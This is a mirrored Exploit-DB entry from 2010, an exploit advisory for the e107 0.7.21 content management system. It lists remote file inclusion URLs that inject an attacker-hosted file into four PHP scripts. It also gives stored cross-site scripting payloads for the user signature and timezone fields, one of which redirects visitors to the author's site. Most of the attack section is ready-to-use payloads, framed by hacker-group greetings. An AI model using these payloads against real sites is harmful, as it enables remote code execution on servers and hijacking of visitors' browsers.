- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12818
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- INDOUSHKA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-05-31
		Код:
	
	======================================================================= 
# e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities 
======================================================================= 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : Inj3ct0r.com                                  0 
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 
0                                                                      0 
1                    ####################################              1 
0                  I'm indoushka member from Inj3ct0r Team             1 
1                    ####################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
  
######################################################################## 
# Name: e107 0.7.21 full (RFI) Vulnerabilities 
# Vendor: http://e107.org/ 
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : indoushka@hotmail.com 
# Home : www.arab-blackhat.co.cc
# Bug  : RFI 
# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : This site is powered by e107, which is released under the terms of the GNU GPL License.    
                                                                 
# Exploit By indoushka 
I - RFI:
1 - http://localhost/e107/fpw.php?THEMES_DIRECTORY=http://localhost/c.txt?
2 - http://localhost/e107/e107_handlers/secure_img_render.php?ifile=http://localhost/c.txt?
3 - http://localhost/e107/e107_plugins/content/handlers/content_class.php?plugindir=http://localhost/c.txt?
4 - http://localhost/e107/e107_plugins/content/handlers/content_convert_class.php?plugindir=http://localhost/c.txt?
II - XSS :
After Rigester Go to user Seting
1 - http://127.0.0.1/e107/usersettings.php
and Edit Signature / Timezone Put this code Or other's 
( ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>""""> )
( <ScRiPt>alert(213771818860)</ScRiPt> )
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
 
 
		